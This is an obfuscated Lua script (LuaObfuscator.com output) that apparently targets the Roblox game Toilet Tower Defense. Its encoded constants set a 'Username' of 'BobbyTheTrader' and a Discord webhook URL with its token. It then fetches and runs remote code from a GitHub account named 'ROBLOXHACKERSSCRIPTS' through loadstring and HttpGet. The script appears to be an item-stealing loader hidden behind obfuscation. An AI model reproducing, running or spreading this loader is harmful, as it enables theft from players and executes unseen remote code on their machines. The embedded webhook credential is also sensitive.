--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v90=0;while true do if (v90==0) then v19=v0(v3(v30,1,1));return "";end end else local v91=v2(v0(v30,16));if v19 then local v112=0;local v113;while true do if (v112==0) then v113=v5(v91,v19);v19=nil;v112=1;end if (v112==1) then return v113;end end else return v91;end end end);local function v20(v31,v32,v33) if v33 then local v92=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + 1)) ;return v92-(v92%(932 -(857 + 74))) ;else local v93=((1447 -(282 + 595)) -((2004 -(1523 + 114)) + 181 + 20))^(v32-(928 -(214 + 713))) ;return (((v31%(v93 + v93))>=v93) and (1 + 0)) or ((0 -0) + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0;local v36;local v37;while true do if (v35==(1 + 0)) then return (v37 * (1321 -(68 + 997))) + v36 ;end if (v35==(1270 -(226 + 1044))) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;v35=1 + 0 ;end end end local function v23() local v38=(1177 -(915 + 82)) -(67 + 113) ;local v39;local v40;local v41;local v42;while true do if (v38==(1 + 0)) then return (v42 * (41190819 -24413603)) + (v41 * 65536) + (v40 * (189 + 67)) + v39 ;end if (v38==((0 + 0) -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (955 -(802 + 150)) );v18=v18 + (10 -6) ;v38=1 -0 ;end end end local function v24() local v43=v23();local v44=v23();local v45=(6 -4) -1 ;local v46=(v20(v44,1 + 0 ,458 -(145 + (1387 -1094)) ) * ((2 -0)^(1219 -(1069 + 118)))) + v43 ;local v47=v20(v44,47 -(11 + 15) ,(34 -24) + 21 );local v48=((v20(v44,1779 -(760 + 987) )==(1 -0)) and  -((2686 -(1789 + 124)) -(201 + 571))) or (1 + 0) ;if (v47==((766 -(745 + 21)) -0)) then if (v46==(0 + 0)) then return v48 * (0 + 0) ;else local v114=791 -(368 + 146 + 277) ;while true do if (v114==(859 -(814 + (123 -78)))) then v47=2 -1 ;v45=0 + (0 -0) ;break;end end end elseif (v47==(724 + 1323)) then return ((v46==0) and (v48 * ((3 -2)/((1 + 17) -(10 + 8))))) or (v48 * NaN) ;end return v8(v48,v47-(3934 -(2286 + 625)) ) * (v45 + (v46/((444 -(416 + 26))^(165 -113)))) ;end local function v25(v49) local v50;if  not v49 then local v94=1055 -(87 + 968) ;while true do if (v94==((1413 -(447 + 966)) -0)) then v49=v23();if (v49==(0 + 0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;local v51={};for v67=2 -1 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 0 + 0 ;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v104==0) then local v119=(function() return 0;end)();while true do if (v119==1) then v104=(function() return 1;end)();break;end if (v119==0) then v95=(function() return 0;end)();v96=(function() return nil;end)();v119=(function() return 2 -1 ;end)();end end end if (v104~=(1 -0)) then else local v120=(function() return 0;end)();while true do if (v120~=0) then else while true do if (v95~=0) then else v96=(function() return v97();end)();if (v98(v96, #"/", #"}")~=(241 -(187 + 54))) then else local v135=(function() return 780 -(162 + 618) ;end)();local v136=(function() return;end)();local v137=(function() return;end)();local v138=(function() return;end)();local v139=(function() return;end)();while true do if (2==v135) then while true do if ((0 + 0)~=v136) then else local v202=(function() return 0 + 0 ;end)();local v203=(function() return;end)();while true do if (v202~=0) then else v203=(function() return 0 -0 ;end)();while true do if (v203==1) then v136=(function() return  #" ";end)();break;end if (v203~=(0 -0)) then else v137=(function() return v98(v96,1 + 1 , #"-19");end)();v138=(function() return v98(v96, #".com",1642 -(1373 + 263) );end)();v203=(function() return 1001 -(451 + 549) ;end)();end end break;end end end if (v136== #"xnx") then if (v98(v138, #"91(", #"91(")== #"{") then v139[ #"http"]=(function() return v99[v139[ #"0313"]];end)();end v100[v101]=(function() return v139;end)();break;end if ( #">"~=v136) then else local v205=(function() return 0 + 0 ;end)();local v206=(function() return;end)();while true do if (v205~=(0 -0)) then else v206=(function() return 0 -0 ;end)();while true do if (v206==(1385 -(746 + 638))) then v136=(function() return 1 + 1 ;end)();break;end if (v206==0) then v139=(function() return {v102(),v102(),nil,nil};end)();if (v137==0) then local v211=(function() return 0;end)();local v212=(function() return;end)();while true do if (v211==0) then v212=(function() return 0 -0 ;end)();while true do if (v212==0) then v139[ #"91("]=(function() return v102();end)();v139[ #"0313"]=(function() return v102();end)();break;end end break;end end elseif (v137== #".") then v139[ #"xxx"]=(function() return v103();end)();elseif (v137==2) then v139[ #"xnx"]=(function() return v103() -(2^(357 -(218 + 123))) ;end)();elseif (v137~= #"gha") then else local v217=(function() return 1581 -(1535 + 46) ;end)();local v218=(function() return;end)();while true do if ((0 + 0)==v217) then v218=(function() return 0 + 0 ;end)();while true do if (0~=v218) then else v139[ #"nil"]=(function() return v103() -((562 -(306 + 254))^(1 + 15)) ;end)();v139[ #"xnxx"]=(function() return v102();end)();break;end end break;end end end v206=(function() return 1 -0 ;end)();end end break;end end end if (2==v136) then local v207=(function() return 1467 -(899 + 568) ;end)();while true do if (v207~=(0 + 0)) then else if (v98(v138, #":", #".")~= #"!") then else v139[4 -2 ]=(function() return v99[v139[605 -(268 + 335) ]];end)();end if (v98(v138,292 -(60 + 230) ,574 -(426 + 146) )~= #"/") then else v139[ #"91("]=(function() return v99[v139[ #"gha"]];end)();end v207=(function() return 1;end)();end if (v207~=1) then else v136=(function() return  #"91(";end)();break;end end end end break;end if (1~=v135) then else local v178=(function() return 0 + 0 ;end)();while true do if (1~=v178) then else v135=(function() return 2;end)();break;end if (v178~=(1456 -(282 + 1174))) then else v138=(function() return nil;end)();v139=(function() return nil;end)();v178=(function() return 1;end)();end end end if (v135~=(811 -(569 + 242))) then else local v179=(function() return 0 -0 ;end)();while true do if (v179~=1) then else v135=(function() return 1 + 0 ;end)();break;end if (v179==(1024 -(706 + 318))) then v136=(function() return 1251 -(721 + 530) ;end)();v137=(function() return nil;end)();v179=(function() return 1272 -(945 + 326) ;end)();end end end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end end end;end)();local v53=(function() return function(v105,v106,v107) local v108=(function() return 0 -0 ;end)();local v109=(function() return;end)();while true do if (v108~=(0 + 0)) then else v109=(function() return 700 -(271 + 429) ;end)();while true do if (v109==0) then v105[v106-#"|" ]=(function() return v107();end)();return v105,v106,v107;end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #".",v58 do local v70=(function() return 0 + 0 ;end)();local v71=(function() return;end)();local v72=(function() return;end)();local v73=(function() return;end)();while true do if (v70==(1501 -(1408 + 92))) then v73=(function() return nil;end)();while true do if (v71==1) then if (v72== #".") then v73=(function() return v21()~=0 ;end)();elseif (v72==2) then v73=(function() return v24();end)();elseif (v72== #"xnx") then v73=(function() return v25();end)();end v59[v69]=(function() return v73;end)();break;end if (v71==(1086 -(461 + 625))) then local v124=(function() return 1288 -(993 + 295) ;end)();while true do if (v124~=(0 + 0)) then else v72=(function() return v21();end)();v73=(function() return nil;end)();v124=(function() return 1172 -(418 + 753) ;end)();end if (v124==(1 + 0)) then v71=(function() return 1 + 0 ;end)();break;end end end end break;end if (v70~=0) then else v71=(function() return 0 + 0 ;end)();v72=(function() return nil;end)();v70=(function() return 1 + 0 ;end)();end end end v57[ #"-19"]=(function() return v21();end)();for v74= #",",v23() do FlatIdent_5346B,Descriptor,v21,v20,v59,v54,v74,v22,v23=(function() return v52(FlatIdent_5346B,Descriptor,v21,v20,v59,v54,v74,v22,v23);end)();end for v75= #".",v23() do v55,v75,v28=(function() return v53(v55,v75,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[530 -(406 + 123) ];local v65=v61[1771 -(1749 + 20) ];local v66=v61[1 + 2 ];return function(...) local v76=v64;local v77=v65;local v78=v66;local v79=v27;local v80=1323 -((1701 -452) + 73) ;local v81= -1;local v82={};local v83={...};local v84=v12("#",...) -1 ;local v85={};local v86={};for v110=1145 -(466 + 679) ,v84 do if ((v110>=v78) or (443>=4015)) then v82[v110-v78 ]=v83[v110 + 1 ];else v86[v110]=v83[v110 + 1 ];end end local v87=(v84-v78) + (2 -1) ;local v88;local v89;while true do local v111=(0 + 0) -0 ;while true do if (v111==(1901 -(106 + 1794))) then if (v89<=5) then if (v89<=(1 + 1)) then if (v89<=(0 + 0)) then local v126=0 -0 ;local v127;while true do if ((0 -0)==v126) then v127=v88[116 -(4 + (966 -(564 + 292))) ];v86[v127]=v86[v127](v13(v86,v127 + (585 -(57 + (909 -382))) ,v81));break;end end elseif (v89==(1428 -(41 + 1386))) then local v140=103 -(17 + 86) ;while true do if ((3 + 1)==v140) then v80=v88[6 -3 ];break;end if ((3382>166) and (v140==(2 -1))) then v86[v88[168 -((367 -245) + 44) ]]=v88[5 -(306 -(244 + 60)) ];v80=v80 + (3 -2) ;v88=v76[v80];v140=2 + 0 + 0 ;end if ((v140==(1 + (478 -(41 + 435)))) or (280==3059)) then v86[v88[3 -1 ]]=v88[68 -(30 + 35) ];v80=v80 + 1 ;v88=v76[v80];v140=3 + 1 ;end if (v140==((2258 -(938 + 63)) -(1043 + 165 + 49))) then v63[v88[3]]=v86[v88[2]];v80=v80 + (3 -2) ;v88=v76[v80];v140=1213 -(323 + 889) ;end if ((1881>1293) and (v140==2)) then v63[v88[7 -4 ]]=v86[v88[582 -(361 + 219) ]];v80=v80 + (321 -(53 + 267)) ;v88=v76[v80];v140=1 + 2 ;end end else v86[v88[415 -(15 + 398) ]]=v88[(2110 -(936 + 189)) -(18 + 964) ];end elseif (v89<=(11 -8)) then local v128=0 + 0 + 0 ;local v129;local v130;local v131;local v132;local v133;while true do if (v128==(2 + 0)) then v88=v76[v80];v86[v88[852 -(20 + 830) ]]=v88[(1616 -(1565 + 48)) + 0 ];v80=v80 + (127 -(116 + 10)) ;v88=v76[v80];v133=v88[1 + 1 ];v130,v131=v79(v86[v133](v13(v86,v133 + (739 -(542 + 196)) ,v88[6 -3 ])));v128=3;end if ((2357==2357) and ((1 + 0)==v128)) then v88=v76[v80];v133=v88[2 + 0 ];v132=v86[v88[2 + 1 ]];v86[v133 + (2 -(1 + 0)) ]=v132;v86[v133]=v132[v88[9 -(1143 -(782 + 356)) ]];v80=v80 + (1552 -(1126 + 425)) ;v128=407 -(118 + 287) ;end if (v128==(0 -0)) then v129=nil;v130,v131=nil;v132=nil;v133=nil;v86[v88[(1390 -(176 + 91)) -((307 -189) + 1003) ]]=v63[v88[8 -5 ]];v80=v80 + (378 -(142 + 235)) ;v128=4 -3 ;end if ((123==123) and (v128==(2 + 3))) then v80=v88[980 -(553 + 424) ];break;end if ((v128==(5 -2)) or (1056>=3392)) then v81=(v131 + v133) -(1 + (0 -0)) ;v129=0;for v176=v133,v81 do local v177=0 + 0 ;while true do if (v177==(0 + 0)) then v129=v129 + 1 + 0 ;v86[v176]=v130[v129];break;end end end v80=v80 + 1 + 0 ;v88=v76[v80];v133=v88[4 -(1094 -(975 + 117)) ];v128=4;end if ((v128==(11 -7)) or (1081<1075)) then v86[v133]=v86[v133](v13(v86,v133 + (1876 -(157 + 1718)) ,v81));v80=v80 + (2 -(1 + 0)) ;v88=v76[v80];v86[v88[1 + 1 ]]();v80=v80 + (4 -3) ;v88=v76[v80];v128=758 -(239 + 514) ;end end elseif (v89>(2 + 2)) then v86[v88[1331 -(797 + 532) ]]();else v63[v88[3 + (0 -0) ]]=v86[v88[2]];end elseif ((v89<=(3 + 5)) or (1049>=4432)) then if ((v89<=(13 -7)) or (4768<=846)) then if (v86[v88[1204 -(373 + 829) ]]==v88[735 -(476 + 255) ]) then v80=v80 + (1131 -(369 + 761)) ;else v80=v88[2 + 1 ];end elseif (v89>7) then do return;end else local v146=0 -0 ;local v147;local v148;while true do if ((v146==1) or (3358<=1420)) then v86[v147 + (1 -0) ]=v148;v86[v147]=v148[v88[242 -(64 + 174) ]];break;end if ((v146==(0 + 0)) or (3739<=3005)) then v147=v88[2 -0 ];v148=v86[v88[339 -(144 + 192) ]];v146=217 -(42 + 174) ;end end end elseif (v89<=9) then v80=v88[3 + 0 ];elseif (v89==(9 + 1)) then v86[v88[1 + 1 ]]=v63[v88[1507 -(363 + 1141) ]];else local v151=v88[(5408 -3826) -(1183 + 397) ];local v152,v153=v79(v86[v151](v13(v86,v151 + ((1020 -(697 + 321)) -1) ,v88[3 + (0 -0) ])));v81=(v153 + v151) -((1 -0) + 0) ;local v154=1975 -(1913 + 62) ;for v174=v151,v81 do local v175=(0 -0) + 0 ;while true do if (v175==(0 -0)) then v154=v154 + (1934 -(565 + 1368)) ;v86[v174]=v152[v154];break;end end end end v80=v80 + (3 -2) ;break;end if ((v111==(1661 -(1477 + 184))) or (1659>=2134)) then v88=v76[v80];v89=v88[1];v111=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403563O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F524F424C4F584841434B45522O534352495054532F536372697074732F6D61696E2F546F696C6574546F776572446566656E736503083O00557365726E616D65030E3O00426F2O627954686554726164657203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323835372O38373934363439333137332O372F63524448716A6B426C7163523479474A55506C5F5774726550575F75413132415A616C48534854735A466B61396E324A534A61316743536E4858545F446567504938454400143O0012023O00013O0026063O000B000100020004093O000B000100120A000100033O001203000200043O00202O00020002000500122O000400066O000200046O00013O00024O00010001000100044O001300010026063O0001000100010004093O00010001001202000100083O001201000100073O00122O0001000A3O00122O000100093O00124O00023O00044O000100012O00083O00017O00",v9(),...);
